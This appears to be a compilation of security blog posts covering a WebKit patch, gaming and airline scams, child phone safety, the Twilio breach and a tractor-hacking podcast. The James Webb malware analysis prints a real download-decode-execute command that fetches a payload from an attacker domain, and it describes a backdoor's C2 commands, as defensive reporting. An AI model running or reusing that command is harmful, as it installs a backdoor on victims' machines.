IT NEWS

Apple has released a security update for iOS 12.5.6 to patch a remotely exploitable WebKit vulnerability that allows attackers to execute arbitrary code on unpatched devices.

The WebKit zero-day that is known as CVE-2022-32893 was fixed for iOS 15.6.1, iPadOS 15.6, and macOS Monterey 12.5.1 on August 17, and for Safari in macOS Big Sur and macOS Catalina on August 18. This update applies to older devices running iOS 12.

Zero-day?

Technically this is not a zero-day, because by definition a zero-day is a software vulnerability previously unknown to those who should be interested in fixing it, like the vendor of the target. And since this vulnerability has been known for weeks it is no longer considered a zero-day, although users of older Apple OS versions were unable to install a patch for this vulnerability until now.

WebKit vulnerability

CVE-2022-32893 is an out-of-bounds write issue that was addressed with improved bounds checking. Processing maliciously crafted web content may lead to arbitrary code execution. An attacker could lure a potential victim to a specially crafted website or use malvertising to compromise a vulnerable system by exploiting this vulnerability. The vulnerability exists in Apple’s HTML rendering software, WebKit, which powers all iOS web browsers and Safari, so possible targets are iPhones, iPads, and Macs which could all be tricked into running unauthorized code.

Apple has already said it’s aware of a report that the issue may have been actively exploited.

Not vulnerable

Apple mentions in the security update for CVE-2022-32893 that iOS 12 is not impacted by CVE-2022-32894. As we mentioned in our blog about the two actively exploited zero-days it seems likely that these vulnerabilities were found in an active attack that chained the two vulnerabilities together. The attack could, for example, be done in the form of a watering hole or as part of an exploit kit. CVE-2022-32893 could be exploited for initial code to be run, and this code could be used to leverage CVE-2022-32894 to obtain kernel privileges. This does not mean the WebKit vulneraility can do no harm on devices that are not vulnerable to CVE-2022-32894, as it could be chained with another vulnerability to obtain higher privileges,

Mitigation

Other than the information that the exploit has been used in the wild, Apple has not released any specifics about the vulnerability. The vulnerabilities are on the CISA list of vulnerabilities to be patched by September 8.

Owners of an iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, or iPod touch (6th generation) can use the update function on the device or use iTunes to update the software to iOS 12.5.6.

Stay safe, everyone!

Final Fantasy 14, the smash-hit online role playing game, is under fire from scammers. The attack is a devious way to try and compromise player accounts, making use of free item promises and bogus QR codes.

As the game is a constantly changing service, it’s almost impossible to keep up with new features, offers, and content. The developers announce these changes on their blog, The Lodestone. What’s being talked about at the moment is the QR code-centric phishing attack.

The developers write:

As we have mentioned in the past, we have confirmed that certain individuals are attempting to direct players to fake login websites which imitate the Square Enix Account Management System in an effort to steal (also known as “phishing”) information such as their Square Enix ID and password, as well as date of birth.

Please also be aware of the following methods used to direct players to fake pages:

・Using FFXIV in-game chat to direct players to fake pages imitating Square Enix websites, including the Support Center, the Lodestone, and the official FINAL FANTASY XIV Forums.

・Including a QR code in an image disguised as an official Twitter or forum post, and scanning the QR code displays fake pages.

・Disguising as a FFXIV game play video with a link to fake pages as part of the video or in the description.

Before opening any URLs, we urge you to confirm that they are legitimate and not a fraudulent imitation.

How the QR code phish attack works

Thanks to players grabbing screenshots, we can show you what these attacks typically look like.

Scammers send direct messages (tells) to other players. Many of the accounts sending these messages appear to have been hijacked themselves. A link is sent to the victim, directing them away from the game to image hosting services.

Literally just got a Tell like that and looked up to see if anyone else got anything similar lol pic.twitter.com/Y7en6WgxAi

— TheBlossomingLily♂ (Zack/”Lily”) (@LilyBlossoming) August 29, 2022

What waits for them is a screenshot of a faked Tweet from the official Final Fantasy 14 account.

hey #ffxiv community new tell scam where they will send a png link where it has a QR code please dont scan it because it will give them access to your personal info and possibly hack your phone

please stay safe! pic.twitter.com/FvtzL8IEzG

— hellfrog enthusiast 🐸🔥 (@hollownozuchi) August 29, 2022

It reads as follows:

We’ve decided to sneak another mount into the 6.2 release. Scan the QR code to automatically add the mount. This mount is only available until 4th September, after this date the mount will become tradeable and will be the only way to own this, so claim it now.

Mounts, pets, and other in-game items can be quite expensive. As a result, any promise of free items will no doubt catch some attention. Scanning the QR code will take the would-be item grabber to a fake login portal. Once the account is stolen, the scammers are free to use it to continue the phishing antics. Gaming accounts with a lot of in-game funds or items attached are of course very valuable. Depending on the game and how trading works, they may sell the account, or items, or trade other content. Final Fantasy 14 players are also at risk due to the perils of Real Money Trading. Often, phishing feeds into this activity too.

Avoiding the scam

In terms of bogus websites, Square Enix has this advice:

The Square Enix Account Management System complies with EV SSL certification. Should a website ask for your Square Enix Account information, please make sure that the website is legitimate before entering any information. On certain web browsers, the address bar will display an icon indicating the website’s security certificate. On a legitimate Square Enix Account Management System login page, clicking this security icon will display references to “SQUARE ENIX CO., LTD.”

* On a legitimate website operated by SQUARE ENIX CO., LTD., no other pages apart from login pages will require password entry, nor will any of our staff ever ask you for your password.Examples of characteristics used in phishing URLs:

* The “s” is missing from “https” in the URL of the login page. The fake website will display http:// in the URL.

* The hyphen symbol is missing from “square-enix.” The fake website will display variations of “squareenix” in the URL.

* The letter “i” is replaced with various characters like “l” or “j.” The fake website will display “square-enlx” or “square-enjx.”

* The “com” in “square-enix.com” is replaced by various domains.

In terms of additional account security, you can make use of a One Time Password to further bolster your security defences. This can be done via an app, or through physical hardware tokens.

QR code scams are very popular in Final Fantasy land, and you can bet they’ll come back around in another form in the near future.

Stay safe out there!

Thanks to Thomas Reed for his expertise and guidance.

This is it.

After much hemming and hawing, you’ve finally given in and bought your child their first smartphone, which you plan to give to them before the school year starts.

But before you give it to them, it’s worth sitting them down to talk to them about things like what apps and sites they shouldn’t use or visit, what online behaviors to avoid engaging in, and what scams they need to look out for. There are also a few easy things you can do to the iPhone itself to make things a bit safer. Here are our suggestions:

Secure the iPhone

Often, when we think of protecting and securing, we also think of the worse possible scenarios. When it comes to smartphones, it’s losing them or having them stolen. Make sure you have the phone locked down every time it’s unattended or not used.

Help your child to choose a passcode for their iPhone, ensuring they can remember it to unlock the device. Set up an alternative way to unlock the phone, but use your biometrics. This is great to have for emergencies.

While we’re on the subject of losing phones, also make sure you—

Enable the Find My feature

That’ll make finding missing phones simpler and easier. You can find the step-by-step process here on Apple’s official site.

If you want to keep track of your child at necessary times, you can also use the Find My Friends feature. Just make sure that you talk to your child about using this first. If you have young adults, use the feature with their permission.

Set up your child’s own Apple ID

If a child is going to have their own iPhone, they should have and use their own Apple ID, too.

After creating your child’s Apple ID, enable two-factor authentication (2FA) for that added layer of security, ensuring that your child’s account won’t get popped easily even if someone got hold of their password.

Note that your child’s iCloud account is automatically created along with their Apple ID. Depending on how heavily they use this feature, you might want to consider purchasing a subscription that grants them some extra online storage. Maybe not now, but in the future.

Having an iCloud account benefits your child more than not having one. When they get older, they may also want to use their account on an iPad or want a newer phone model. An iCloud account makes this easier, but remember that having data in the cloud also has security and privacy risks attached to it.

Once your child has an Apple ID, you can set up Family Sharing on their device. By using this feature, you can not only hand pick what content to share with members of the family but also control the buying and downloading of games, ebooks, and apps on their device wherever you are.

Disable or hide features you deem off-limits or unnecessary

iPhones have features that young kids can use, and there are some that they just shouldn’t touch at all until they’re old enough or you explicitly give them permission to use.

Ideally, we don’t want our kids fiddling with Screen Time as there are lots of settings in there that they will just gladly change based on their preference. These settings include (among others):

• Content restrictions on Safari
• iTunes and App Store purchases
• Siri and Dictation
• Privacy settings (includes location services)

You can secure Screen Time by creating a passcode for it. Make sure you use a passcode that’s different from other passcodes you help set up with your child.

Depending on your child’s age, mental and emotional maturity, and how you want them to use their device, feel free to add more or remove some from the list above. For example, if your child is 10 or 11, you might want to hide the email feature for now until they’re a bit older. Remember, what you disable or hide should be non negotiable… at least until a later date, when you can review, assess, and adjust the above accordingly.

Limit or restrict features they can use

This is probably the hard part since your child is likely to have different views from you on what they should be allowed to do on their phone. When it comes to having social networking accounts, for instance, you may want to delay this for a few more years, even if the platform allows 13-year-old kids to use it.

Being in social networks at a young age is risky for children. Child predators camp on there, and not every piece of content shared within these environments is child-friendly. One study even showed that, apart from giving kids a different or unhealthy view of the real world, young children who are on TikTok began developing tics and having tic-like attacks brought about by anxiety and stress. They may also begin showing signs of mental health issues. 

As a parent and guardian, you can also limit screen time, which is easy to do using the iPhone’s Family Share feature. Apple has a guide on how to set this up as well.

If your child is into playing games on their iPhone, you might want to tweak Game Center settings, so they’re not exposed to potential risks needlessly. iOS can restrict adding friends, playing multiplayer games, and the sending of private messages (among others) on the Game Center.

The iPhone also has Guided Access that you can customize to put more limitations, such as limiting how long your child uses an app.

Do you have an old iPhone you want to hand down to your child instead of buying a new one? Make sure your files are properly backed up in iCloud, then you can wipe your data from the phone by performing a factory reset.

Final thoughts

Giving your kids a new smartphone doesn’t mean that you’re giving them free rein to do what they want to do with it. Walking them through the setup process and talking with them about what’s acceptable and not while also giving them an opportunity to speak up is a good way of showing—and reminding—your kids that, at the end of the day, you, the Parent or Guardian, is the boss.

You don’t even have to tell them that.

A rather unique approach to spread malware using the popularity of the James Webb telescope images has been identified by the Securonix threat research team.

The malware is being spread by a phishing campaign that includes a Microsoft Office attachment. Similar to traditional Office macros, the template file contains a Visual Basic script that will initiate the first stage of code execution for this attack once the user enables macros. Through several steps the actual payload turns out to be a Golang binary file that acts as a backdoor.

Golang

Golang or GO, which is the actual name of Golang, is an open source programming language. Some threat actors have started writing malicious code using cross-platform programming languages like Golang, Python, and Rust, with the aim of penetrating and encrypting as many systems as possible. This allows their malware to run on different combinations of operating systems and architectures.

VBA Macro

In this campaign, when the document is opened, a malicious template file is downloaded and saved on the system. The template includes the functions Auto_Open, AutoOpen, and AutoExec. The malicious VBA macro code is set to be auto executed once macros are enabled.

VBA macros should be disabled unless there are compelling reasons not to. As we explained when Microsoft disabled macros for five Office apps, the Mark of the Web (MOTW) can be circumvented by malware authors.

Certificate

The obfuscated code in the macro executes the following command:

cmd.exe  /c cd c:users{username}appdatalocal & curl http://www.xmlschemeformat.com/update/2021/office/oxb36f8geec634.jpg -o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634.jpg msdllupdate.exe & msdllupdate.exe

This command will download a file named OxB36F8GEEC634.jpg, use certutil.exe to decode it into a binary called msdllupdate.exe and then finally, execute that binary.

But, if you open the .jpg with any of the programs that are normally associated with JPG files, you will see this image:

But, remember when we talked about steganography? Images can be used to hide information, or an executable in this case.

Obfuscation

The image contains malicious Base64 code disguised as an included certificate. Base64 is an encoding scheme designed to carry data stored in binary formats across channels that only reliably support text content. Base64 is particularly prevalent on the World Wide Web where one of its uses is the ability to embed image files or other binary assets inside textual assets such as HTML and CSS files.

In the command we saw how the legitimate certutil was used to decode the so-called certificate and create a binary called msdllupdate.exe.

Payload

The malware payload copies itself into %localappdata%microsoftvault and creates and executes a batch file in the same folder called update.bat. The .bat file creates the directory %LOCALAPPDATA%microsoftwindowsMsSafety and adds another copy of msdllupdate.exe to that folder. For this file, a startup entry is created in the registry to achieve persistence.

The malware connects to a C2 server and goes into an infinite loop waiting for commands from the C2. Three commands are supported:

• sleep to change timeout between C2 requests
• timeout to change timeout parameter in nslookup request
• all other commands will be executed with “cmd.exe /c”

Basically this allows the threat actor to execute arbitrary code on the affected machine.

Mitigation

Malwarebytes customers were protected right from the start since Malwarebytes detected the Msdllupdate.exe file without requiring any updates. Our detection engine identified it as malicious by using our generic criteria for suspicious files.

The Malwarebytes web protection engine will also block traffic to the C2 servers involved in this campaign and the domains hosting malware files.

Stay safe, everyone!

Malwarebytes Endpoint Protection continues to receive outstanding results in third-party testing. Our recent participation in two highly-regarded industry evaluations, namely MRG-Effitas and Info-Tech’s Data Quadrant Report, reflects our belief that continual testing and unbiased validation are crucial to our mission to deliver easy, effective, and efficient cyber protection for customers. 

Info-Tech’s Data Quadrant report: Malwarebytes ranks #2 overall and #1 across several key areas

Using data collected from real end users, Info-Tech’s Data Quadrant Reports provide a holistic, unbiased view of the product landscape to help you determine which product is right for your organization. Malwarebytes ranked #2 out of 14 organizations in the report, earning a composite satisfaction score of 8.8.

Malwarebytes also took the #1 spot for three different categories: 

1. Usability And Intuitiveness (Shallow end user learning curve): 87% user satisfaction 

2. Vendor Support (Offers quality support): 84% user satisfaction 

3. Flexible Deployment Options (Supports on-premise, cloud and hybrid IT environments): 87% satisfaction

MRG Effitas 360° Assessment & Certification: Badges across the board

MRG Effitas, a world leader in independent IT research, published its antivirus efficacy assessment results in August 2022. We achieved the highest possible score (100%) for a fourth consecutive quarter and received certifications for Level 1 (the highest ranking awarded by MRG Effitas), Exploit, Online Banking, and Ransomware.

Tested and published in a separate report, our mobile product also achieved the MRG Android 360 degree certification. 

Malwarebytes Endpoint Protection blocked a wide range of ransomware, fileless attacks and other threats:

• 100 percent of “in the wild” threats blocked: Tested malware considered as ‘zero-day’, delivered by URLs 

• 100 percent of ransomware blocked: Tested ‘in-house’ ransomware samples in-house (no possibly known signatures or community verdicts)

• 100 percent of financial malware blocked: Tested financial malware used in the Magecart credit card-skimming attack

• 100 percent of fileless attacks blocked: Tested to see how security products protect against a specific exploitation technique

• 100 percent of PUA/adware blocked: Tested potentially unwanted applications (PUA), that are not malicious, but are generally considered unsuitable for most home or business networks.

Malwarebytes Endpoint Protection also delivered the fourth best performance rating of all tested vendors, and did it with zero false positives, providing further evidence that the Malwarebytes EP delivers the right combination of powerful detection without affecting overall operating system performance.

Easy, effective, and efficient cyber protection validated by third-party testing

Malwarebytes is committed to regularly subjecting our solutions to third-party testing.

Third-party testing is critical to ensuring that your endpoint security solution performs well where it counts, whether that’s ease-of-use, rate of false positives, percentage of threats blocked, and so on. To read more about what customers have to say about Malwarebytes Endpoint Protection and EDR, check out our case studies page.

More resources

Why MRG-Effitas matters to SMBs

MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks

Why MITRE matters to SMBs

Getting back into the travel habit? Jumping on a plane soon? Experienced a bit of a luggage disaster and looking for help on social media? Watch out, because a lack of prior research could prove very costly.

Word has spread of a bogus Twitter account pretending to be a customer support channel of British Airways. Now suspended, the fraud operation seems to have taken a fair bit of cash before being shut down. 

Lose your luggage, find a fraud

People posting about missing luggage on Twitter quickly found their replies filling up with offers to help from a non-verified account purporting to be British Airways. The account asked for phone numbers and likely pushed for additional contact via Twitter’s private message system.

Unfortunately, these offers of help quickly turned sour. The scam account requested various forms of payment to help recover the missing luggage. Although the fakers have been suspended, a lot of replies sent their way still exist. Looking through, we can see at least one individual who was initially told that her luggage was “lost in Dallas”. To move things along, a request for payment was made using the payment system Wise.

Though initially a small amount overall, the scammers quickly ramped things up. It’s not long before the victim complained that they were being asked for even more money. Eventually, they claim to have lost out on no less than a thousand US dollars. Of course, they still don’t have any idea where their luggage has ended up. Taking these amounts from people who are overseas, with no belongings, and a now potentially cleaned out bank account is quite the vicious approach.

Avoiding the luggage assistance fakers

Here are some things you should do, and be aware of, when in transit.

• Airlines are not going to ask for additional fees or payment to help you look for your bags.
• Be wary of non-verified accounts replying to you. Is it asking for additional personal details? Phone numbers? Payment? Why?
• Go directly to the source. Use official websites, verified support channels, phone numbers listed on those official websites. You can pretend to be anyone you like on social media, and this is a ripe field for potentially costly scams.
• If you’re still not sure of the authenticity of an account you’re dealing with, go to the airport help desk. If you’ve realised your bags are missing, you’re almost certainly still in the terminal. Make full use of their availability and ensure everything and everyone you’re interacting with is the real deal.

As people slowly start to get back into the swing of travel, it’s inevitable that fraudsters will do as much as they can to rip those travellers off in any way they can. Customer support is great, but it pays to be mindful when ringing the help alarm. You never quite know who’s going to show up in response.

If you are a user of Google Chrome or any other Chromium-based web browser, then websites may push anything they want to the operating system’s clipboard without your permission or any user interaction. This means that by simply visiting a website, the data on your clipboard may be overwritten without your consent or knowledge.

Clipboard

In layman’s terms, the clipboard is where the data lives while you copy and paste, or cut and paste for that matter. Copying and pasting is such an essential part of our daily computing that most of us just do it automatically. And it can lead to undesirable results if something outside of our control decides to interfere. For example, if you used the “cut” action on a certain piece of text with the intention to paste it somewhere else, it can be a nasty surprise if something completely different gets pasted, and due to using the cut rather than copy, you may have lost the original.

Gestures

Firefox and Safari do require a user gesture before websites can copy content to the device’s clipboard. User gesture in this context means that the user is selecting content on the site and using Ctrl+C or other means to copy it to the clipboard. Chrome and other Chromium-based browsers currently have no such restriction.

Demonstration

If you’d like to see this demonstrated or if you want to check if you are somehow protected against this happening, you can visit the Webplatform News website to test your browser. All it takes is to visit the site and check the content of the clipboard afterwards. You can check the content by “pasting” to an empty text editor like Notepad. Should you get the following message in your clipboard, the browser is vulnerable to unauthorized clipboard manipulation:

“Hello, this message is in your clipboard because you visited the website Web Platform News in a browser that allows websites to write to the clipboard without the user’s permission. Sorry for the inconvenience. For more information about this issue, see https://github.com/w3c/clipboard-apis/issues/182.”

Windows clipboard manager

For Windows 10 and 11 users there is a way to retrieve overwritten items from your clipboard. These Windows versions come with a clipboard manager, although it does need to be turned on first. This can be done in the Settings menu on your computer. Under System, you’ll find a section called Clipboard. Toggle the switch to On behind Clipboard history. Windows will now start keeping track of your clipboard content. To review the history up to 25 items you can use the Win+V keys.

Not new

At Malwarebytes Labs we wrote about clipboard poisoning attacks on the Mac back in 2016. The take-away from that article in the current context is that by pasting in a sensitive place, like the Terminal on a Mac, or a Command Prompt on a Windows machine, text can become a command that gets executed.

Broken

In his article about the clipboard issue, developer Jeff Johnson states that the user gesture requirement for writing to the clipboard was accidentally broken in version 104. And although the vulnerability has been flagged, fixing it may be delayed because it breaks other functionality. Apparently, adding user gesture requirement for readText and writeText APIs breaks NTP doodle sharing. NTP Google doodles are animations that appear in some cases in Chrome when a new tab is opened. Personally, I wouldn’t miss them at all.

Mitigation

While we wait for a fix, threat actors may come up with ways to abuse this temporary vulnerability. Here are some things you can do to stay on the safe side:

• Do not open webpages between any cut/copy and paste actions.
• Check the content of your clipboard before you past into any sensitive areas. You can use any clipboard manager or just paste into a text field to see what is momentarily there. For those of you doing financial transactions this is always worth considering, since there is malware out there that can change bitcoin addresses and bank account numbers on your clipboard.

Stay safe, everyone!

Earlier this month, messaging service Twilio got compromised by a sophisticated social engineering attack. After deploying phishing attacks against company employees, hackers were able to access user data, but now it seems that the impact of the hack was more elaborate than originally assumed.

In a first update, Twilio, a cloud-based communication platform provider, revealed that the attackers also compromised the accounts of some users of Authy, its two-factor authentication (2FA) app. Outisde of Twilio, the identity authentication company Okta revealed that the data of some Okta customers was accessible to a threat actor, as well. And Signal tweeted that they, too, had been affected by the Twilio breach.

Authy

Authy is a two-factor authentication (2FA) service from Twilio that allows users to secure their online accounts by double-checking the login attempt via a dedicated app, after typing in the login credentials.

By gaining access to 2FA data, the malicious actors gained access to the accounts of 93 individual Authy users and registered additional devices to their accounts. Twilio says that it has now removed such devices from accounts.

Okta

Okta has determined that a small number of mobile phone numbers and associated SMS messages containing one-time passwords (OTPs) were accessible to the threat actor via the Twilio console. A one-time password is an automatically generated numeric or alphanumeric string of characters that authenticates a user for a single transaction or login session. OTPs typically expire after a short period (up to one minute).

Okta offers customers a range of authenticators to choose from, including the use of SMS for the delivery of one-time codes. Twilio provides one of two services Okta leverages for customers that choose to use SMS as an authentication factor.

Signal

Signal is an end-to-end encrypted messaging service, similar to WhatsApp or iMessage, but owned and operated by a non-profit foundation. Twilio provides Signal with phone number verification services. As a result of the attack on Twilio, Signal warned that for 1,900 users, an attacker could have attempted to re-register their number to another device or learned that their number was registered to Signal. These 1,900 users were notified directly, and prompted to re-register.

Signal’s tweet about the Twilio breach

Scatter Swine

The Twilio data breach appears to be part of a larger campaign from hackers that targeted at least 130 organizations, among them MailChimp, Klaviyo, and Cloudflare.

In this campaign, spanning recent months, a number of technology companies were subject to persistent phishing attacks by a threat actor that you will see referred to as Scatter Swine or Oktapus. This threat actor is known to repeatedly target the same organizations with multiple phishing attacks within a matter of hours.

In the Twilio case, the threat actor searched for 38 unique phone numbers in the Twilio console, nearly all of which can be linked to a single targeted organization. A review of logs provided by Twilio revealed that the threat actor was seeking to expand their access. It is likely that the threat actor used credentials previously stolen in phishing campaigns to trigger SMS-based MFA challenges, and used access to Twilio systems to search for OTPs sent in those challenges.

Mitigation

If you are a user of any of the services mentioned above, you should have been notified if your account was affected, but it doesn’t hurt to check the advice and details about the attack on their respective sites.

• Authy: enable or disable Authy multi-device
• Okta: ScatterSwine
• Signal: Twilio incident: what Signal users need to know
• MailChimp: information about a recent security incident targeting crypto companies

One general piece of advice is to be extra vigilant about “new device added” notifications from any provider. This could be a warning signal that a threat actor is trying to intercept 2FA messages or OTPs that are intended for you.

In 1993, the video game developers at id Software released Doom, a first-person shooter that placed a nameless protagonist into the fiery depths of hell, equipped with an arsenal of weapons to mow down imps, demons, lost souls, and the intimidating “Barons of Hell.” 

In 2022, the hacker Sick Codes installed a modified version of Doom on the smart control panel of a John Deere tractor, with the video game’s nameless protagonist this time mowing down something entirely more apt for the situation: Corn.

At DEFCON 30, Sick Codes presented his work to an audience of onlookers at the conference’s main stage. His efforts to run the modified version of Doom, which are discussed in today’s episode of Lock and Code with host David Ruiz, are not just good for a laugh, though. For one specific community, the work represents a possible, important step forward in their own fight—the fight for the “right to repair.” 

“Right to Repair” enthusiasts want to be able to easily repair the things they own. It sounds like a simple ask, but when’s the last time you repaired your own iPhone? When’s the last time you were even able to replace the battery yourself on your smartphone?

The right to repair your equipment, without intervention from an authorized dealer, is hugely important to some farmers. If their tractor breaks down because of a software issue, they don’t want to wait around for someone to have to physically visit their site to fix it. They want to be able to fix it then and there and get on with their work.

So, when a hacker shows off that he was able to do something that wasn’t thought possible on a device that can be notoriously difficult to self-repair, it garners attention.  

Today, we speak with Sick Codes about his most recent work on a John Deere tractor, and how his work represents a follow-up to what he a group of researchers showed last year, when he revealed how he was able to glean an enormous amount of information about John Deere smart tractor owners from John Deere’s data operations center. This time around, as Sick Codes explained, the work was less about tinkering around on a laptop and more about getting phsyical with a few control panels that he found online. 

“It’s kind of like surgery but for metallic objects, if that makes sense. Non-organic material.”

Tune in today to listen to Sick Codes discuss his work, why he did what he did, and how John Deere has reacted to his research. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Last week on Malwarebytes Labs:

• Cryptojackers growing in numbers and sophistication
• CISA wants you to patch these actively exploited vulnerabilities before September 8
• Reddit users crowdsourcing explicit images and identities
• Criminals socially engineer their way to bank details with fake arrest warrants
• Google flags man as sex abuser after he sends photos of child to doctor
• Thousands of Hikvision video cameras remain unpatched and vulnerable to takeover
• 6 reasons MSPs need a patch management platform
• How to secure a Mac for your kids
• Reset your password now! Plex suffers data breach
• ChromeOS vulnerability found by Microsoft
• Twitter security under scrutiny after former executive turns whistleblower
• Binance chief says a “sophisticated hacking team” turned him into a deepfake hologram
• Update now! GitLab issues critical security release for RCE vulnerability
• Introducing Patch Management for OneView
• Exploits and TrickBot disrupt manufacturing operations
• Source code of password manager LastPass stolen by attacker
• Adware found on Google Play — PDF Reader servicing up full screen ads

Stay safe!